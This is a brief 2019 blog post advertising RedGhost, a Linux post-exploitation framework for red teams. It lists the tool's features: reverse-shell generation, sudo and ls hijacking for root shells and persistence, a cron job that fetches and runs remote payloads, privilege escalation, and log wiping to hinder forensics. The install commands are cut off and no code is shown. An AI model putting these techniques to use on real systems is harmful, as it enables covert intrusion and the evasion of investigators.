Friday 19 July 2019

RedGhost - Linux Post Exploitation Framework

RedGhost -  Linux Post Exploitation Framework

RedGhost- Linux post exploitation framework 

It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. 

  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion

  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence

  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make investigation with forensics difficult

  • MassInfoGrab
Function to grab mass reconaissance/information on system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute remote bash script in memory

  • BanIp
Function to BanIp using iptables


Install RedGhost in one line code:

wget; chmod +x; ./

One line code to Install prerequisites and RedGhost :

wget; chmod +x; apt-get install dialog; apt-g

Download Redghost


Post a Comment

Note: only a member of this blog may post a comment.

Toggle Footer